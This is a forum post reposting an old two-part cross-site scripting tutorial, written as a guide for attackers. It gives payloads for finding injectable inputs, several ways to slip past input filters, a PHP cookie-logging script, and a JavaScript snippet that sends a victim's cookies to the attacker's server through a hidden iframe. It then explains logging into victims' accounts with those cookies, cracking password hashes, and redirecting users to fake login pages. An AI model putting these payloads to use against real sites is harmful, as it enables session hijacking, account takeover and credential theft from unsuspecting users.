Okay, before I post this I would like to mention that this tutorial is old as hell, and wasn't originally written for this forum. It were also 2 parts of one tutorial which I just threw together.
Enjoy:
Read this first!: this guide is for eductional purposes only! I won't take responsibility for you running around eMurdering people, okay?
the examples here will not work on neopets, they filter all the methods described below
I do know ways around Neopets filters, I have, in fact, made cookiegrabbers for neopets, but I won't post them just because I don't know if it's fine with the forum admins. (and also: I haven't been on Neopets for ages, these exploits might have been fixed by now.) Part 1 What do i need to know before i read this tutorial?
basic HTML,
Basic Javascript
What is XSS?
XSS (or Cross Site Scripting) is basicially just managing to get javascript on a page.
What is javascript?
javascript is a script language that is run locally. that means the code won't get parsed before it is in your browser. other languages, like PHP, get parsed on the server and output HTML, and nothing but HTML.
but javascript is local. it won't be run, and the code won't be changed before its on your browser.
Okaaaayyyy... why would i want to put that on a page?
That one is simple. so you can run scripts.
but seriously, you can do great things with javascript. you can steal cookies for example.
Yes. thats right. javascript supports cookies. even tho it wont be run before its on your browser.
What are cookies, and what flavour?
my favorite. digital.
cookies are, well, strings that are saved on your Computer by websites. only the website who set the cookie (put it on your computer) can read it or edit it.
so sitetwo.com cant read or edit cookies from siteone.com. therefore your cookies are rather save.
but this is where javascript jumps in. by injecting javascript to a page you can steal cookies. how? easy. you just have to run javascript ON the site that set the cookie.
No shit sherlock, but isnt that... well, IMPOSSIBLE?!?
nothing is impossible. neither is stealing cookies. you just have to find the right places to inject the javascript.
some sites allow you to create lookups. with html. there you can inject javascript that steals cookies, and then everybody who visits your lookup will run the javascript on his browser, and give you his cookies.
you have to be creative. the typical place to inject javascript is the search function. i like to search for "butter<>'"pepper" then i view source and search for the word butter.
now lookups and searches are not the only injectable thing. be creative. every input and GET var(something like ?search=Mysearch or similar) you can find on the site!
now i look if it exists. if it does, then i look if it is inside a tag. then finally i look if <,>,", or ' get replaced or deleted.
if they wont, then i search for <script>alert('Test')</script>, or if it is inside a tag then either for "><script>alert('Test')</script> or '><script>alert('Test')</script>
often the quotes are backslashed. that means " turns to \" and ' turns to \'.
<script>alert(\'Test\')</script> wouldn't work... so what do we do?
well, there are 2 things we CAN do now.
either we replace the quotes inside our javascript with /'s (that will actually work!!!)
so we have <script>alert(/Test/)</script>
OR
we just simply don't USE quotes. but how? well, integers (numbers) don't require quotes in functions, so <script>alert(1)</script> would work, but that isn't really helpful...
or is it?
YES!
Javascript has a number of neat feautures! one of them is "String.fromCharCode()"!
what does string from char code do? well, it translates numbers into letters.
now, "Test" would become "84,101,115,116"
well, how do i know wich number stands for wich letter so i can generate my code?
well, i suppose i could tell you, but i am just gonna link a tool i made some time ago:
the string.fromCharCode generator!
this tool turns your text automaticially into numbers for string.fromCharCode!!!
good. so we type the word "Test" in the generator.
it outputs:
String.fromCharCode(84,101,115,116)
good, then lets trust that thing and try it!
<script>alert(String.fromCharCode(84,101,115,116)) </script>
Yes! it worked! and it doesnt require any quotes to work AT ALL!!!
we ran javascript on the site!
but hey, wait a minute! how do i grab cookies?
well that you will find out in part 2 of the tutorial, wich i am going to write later.
i hope you enjoyed this.
i sure did enjoy writing it. feel free to ask questions.
Part 2
Stop!
before you read this make sure you have read my first part!
do tell, how do i grab cookies?
well, there are many methods. and most of the time PHP is involved.
most of the php scripts use logfiles, some use MySQL, wich is the better solution.
but lets stick with logfiles for now. if you want to use MySQL, then learn some php, or get a script from somebody who knows PHP.
Code:
if($_GET['c']) {
$file = fopen("log.txt","a");
fputs($file,$_GET['c']."\r\n\r\n");
fclose($file);
}
?> nice code huh?
yeah, but what does it do?
well, that is quite simple.
<? starts the PHP, everything that follows after the <? to the next ?> will not be visible, except special functions (that are unimportant for us) are used.
if($_GET['c']) checks if cookies were given to the script.
it basicially just checks if there is a ?c= in the url.
$file = fopen("log.txt","a") opens the file "log.txt" to write in it
fputs($file,$_GET['c']."\r\n\r\n") writes the cookies that were given to the script in the log.txt
fclose($file) closes the file
} ends the if loop
?> ends the php code
now it will write into the logfile whatever is given to the script per get.
so
http://yourwebsite.com/cookiegrabber.php?c=cookies
will write "cookies" in the log.txt
wait... PHP? i thought you could only inject javascript...
you can. but you can't write a logfile with it. and if you could it would be on the wrong server!
so what do we do? we make javascript open and iframe with the PHP and the cookies behind the "c=" thing.
this will look like this (or similar):
c.php is the php script from above.
<script>
document.write("<iframe src='http://www.yoursite.com/c.php?c="+document.cookie+"' width=0 height=0 frameborder=0></iframe>");
</script>
now lets take a look at this.
document.write writes text on the page, unlike alert.
so it writes and iframe on the page. and the page in it is our logger.
now whats that "+document.cookie+" stuff?
well, document.cookie is the cookies of the page in a string. yay, cookies!
"" ends the string that is document.written, and the plus adds something to the string.
so it is iframe src= PLUS cookies PLUS /iframe.
clever. clever indeed.
this will send our cookies to our script wich logs them! genius!
but what if quotes are not allowed?
well then we just turn the text into string.fromCharCode and leave the document.cookie as it is.
document.write(String.fromCharCode(Code1)+document .cookie+String.fromCharCode(Code 2))
and now we have the cookies of the victim!
Awesome!
Yes, awesome indeed.
But wait... what do i do with the cookies?
you log in.
either you get an extension for firefox that allows you to edit/add cookies and switch your cookies with the grabbed cookies so you are in the account of your victim, or you get opera to do it, OR if you do not want to be caught in other accounts because you have one of your own, or because you do not like lawsuits, then you use a Proxy.
i would suggest my PHP proxy. it works extremely easy with grabbed cookies.
http://www.wocares.com/kyobot.php
just put the cookies you grabbed in the cookies box, the site you grabbed them from in the URL box and there you are in the account of the victim.
another way is, who would have thought, javascript!
go to the site you got the cookies off
then put "java script: document.cookie='cookie1=data1';document.cookie='c ookie2=data2';"
in your bar, replacing cookie1, 2 and data 1, 2 you can add as many document.cookie='cookie=data';'s as you want.
i want to edit his profile, but i need his password for that,what do i do?
well, either the password is raw in the cookies which i highly doubt, or it is as MD5 in there. maybe even something else, but MD5 and raw are the most common things
if it is raw just take it and use it. if it is MD5 then get yourself some MD5 cracker. you might not be able to crack it, but there is a chanche. good luck.
well, that was awesome, what else can i do with injected javascript?
you can redirect people to sites (like your own site, or a fake login)
lets say you send a victim an URL "http://sitewithxsshole.com/?x=XSS"
the injected code in the URL redirects the victim to your site (
http://www.yourevilsite.com/fakelogin.php) now the user saw the right URL in the email/message/whatever so it thinks it is still on sitewithxsshole.com and it logins. now you have his data.
location.href = "http://newsitetobeon.com"; is the function to redirect.
be creative, do whatever you want!
tags work fine, but <script> gets replaced. what should i do?
filter evasion. either you use event handlers, or you try to trick the filter.
lets say <script> gets replaced by nothing. so gets </script>. what do we do?
we trick the filter:
<sc<script>ript> XSS </sc<script>ript>
now the <script>s get deleted, so what is left is <script></script>.
Awesome! this won't work in most cases tho. but that is one way to trick a filter. again, be creative!
now another method is just not to use the script tags.
not to use the script tags?
yes! as how i mentioned before: event handlers!
okay, and whats that?
it is basicially onsomething="script" in a tag. there are many event handlers, i am just going to go thru one of them.
<body onload="XSS">
is the same as
<script>XSS</script>
with one little exception. if you document.write in an event handler, javascript doesnt know where to write your text. so it overwrites the whole page with your text. this is good if you want to deface something, but bad if you want the user not to notice your exploit. i am going to get back on that later.
wow! 2 different methods to inject javascript! that is so awesome!
well that is not it.
now i want you to do something: copy and paste this in the thing where you put in the URLs in your browser:
java script:alert('I am javascript too!');
saw it? awesome huh? javascript per URL!
now how do we use this?
either we link it and hope that the user clicks it, or we make the page go there automaticially. this can be done using meta refreshes.
<META HTTP-EQUIV="refresh" CONTENT="0;url=java script:alert('it worked!');">
wow! another exploit. that is awesome huh?
now some sites have automatical redirection scripts. lets put javascript in there using the same method!
didn't work? i thought so. most sites redirect by manipulating headers. in that case it won't work. but sometimes people use javascript or meta to redirect. then, it will.
i hope you enjoyed, feel free to ask questions!
